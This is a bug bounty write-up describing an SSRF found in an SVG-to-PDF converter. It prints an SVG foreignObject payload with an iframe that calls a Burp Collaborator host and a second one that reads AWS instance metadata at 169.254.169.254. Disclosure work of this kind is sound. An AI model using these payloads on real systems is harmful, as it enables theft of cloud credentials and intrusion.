بسم الله الرحمن الرحيم

Some of the Information on this Post such as Target URL, Endpoint, and several others was modified due to Protect the Privacy of the Program

A Few times ago, I had the opportunity to do Bug Hunting activities in one of the Private Programs at Bugcrowd. In this program, there is a complex application with various features. One of the highlights is converting objects to PDF, JPG, PNG files from SVG.

When I found a feature to create PDFs from data inputted by the user, I immediately conducted an experiment to carry out SSRF attacks by changing the SVG code that was sent to HTML containing the iframe tag, which was directed to the Burp Collaborator.

POST /convert HTTP/2
Host: target.com
Cookie: -
Content-Length: -
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Dnt: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBdAsEtYaBjTArl3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,eu;q=0.6,ms;q=0.5
Connection: close

------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="svg"


<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--

But unfortunately, the server responded with an error message.

{"message": "Error when converting data."}

It looks like the server can only process input that is a valid SVG file.

After doing some googling, I found that we can embed the HTML code into the SVG code using an element named foreignObject.

The SVG element includes elements from a different XML namespace. In the context of a browser, it is most likely (X)HTML.

Source: https://developer.mozilla.org/en-US/docs/Web/SVG/Element/foreignObject

So I changed the payload to be like this:

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
    <g>
        <foreignObject width="800" height="500">
            <body xmlns="http://www.w3.org/1999/xhtml">
                <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
            </body>
        </foreignObject>
    </g>
</svg>

After getting a hit on the Burp Collaborator Client, I checked the IP address used, and it turned out that the application uses Amazon Web Service and from the User Agent I notice that the SVG is rendered using PhantomJS.

So I modified the payload to exfiltrate the Metadata on the AWS Instance.

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
    <g>
        <foreignObject width="800" height="500">
            <body xmlns="http://www.w3.org/1999/xhtml">
                <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
            </body>
        </foreignObject>
    </g>
</svg>

And metadata was successfully obtained.

SSRF in PDF Renderer using SVG

I immediately reported this finding, marked as P1 and was rewarded $2,150.